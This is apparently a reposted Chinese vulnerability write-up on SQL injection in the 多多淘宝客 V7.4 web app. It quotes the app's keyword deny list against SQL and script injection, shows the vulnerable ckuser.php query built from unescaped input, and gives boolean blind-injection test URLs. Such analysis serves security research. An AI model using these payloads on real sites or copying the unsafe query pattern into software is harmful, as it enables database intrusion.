由于程序是开源程序 并下载其程序看了一番。其实程序员还是有一点安全意识的: 防注入代码: //要过滤的非法字符 $ArrFiltrate = array ( "#union#i", "#<script#i", "#/script>#i", "#select#i", "#alert#i", "#javascript#i", "#<table#i", "#<td#i", "#\"#i", "#\'#i", "#delete#i", "#vbscript#i", "#applet#i", "#frame#i", "#<div#i", "#update#i", "#'#i", "#union #i", "#select #i", "#delete #i", "#update #i", "#and #i", "#;#i", "#update#i" ); $replacements=''; function FunStringExist(&$array,$ArrFiltrate,$replacements) { if (is_array($array)) { foreach ($array as $key => $value) { if (is_array($value)) FunStringExist($array[$key],$ArrFiltrate,$replacements); else $array[$key] = preg_replace($ArrFiltrate, $replacements, $value); } } } FunStringExist($_GET,$ArrFiltrate,$replacements); FunStringExist($_POST,$ArrFiltrate,$replacements); 这段代码多少还是有瑕疵的、只过滤 HdhCmsTest2cto测试数据 get post 我们只要找调用request的地方 别一个文件并没有调用防注入程序,导致字符注入、但受gpc影响 header("Content-Type:text/ html ;charset=utf-8"); include "comm/config.php"; $uname = trim($_GET["name"]); if($uname==''){ echo "true"; }else{ $con = @ mysql _connect("$dbserver","$dbuser","$dbpass" )or die(ERR_DB); mysql_select_db("$dbname",$con)or die("can not choose the dbname!"); $query="select * from ".$BIAOTOU."user where ddusername='".$uname."'"; mysql_query("set names utf8"); $res=mysql_query($query); if(mysql_num_rows($res)!=0) {echo "true";} else {echo "false";} } 首先注册一个用户.让程序能过判断 ckuser.php?name=maxadd' and 1=1 and ''=' 返回true ckuser.php?name=maxadd' and 1=2 and ''=' 返回false 原文:http://hi.baidu测试数据/0x7362/blog/item/4bab6a2fba63a765ac34de0c.html
查看更多关于多多淘宝客V7.4绕过防注入及一个注入漏洞 - 网站的详细内容...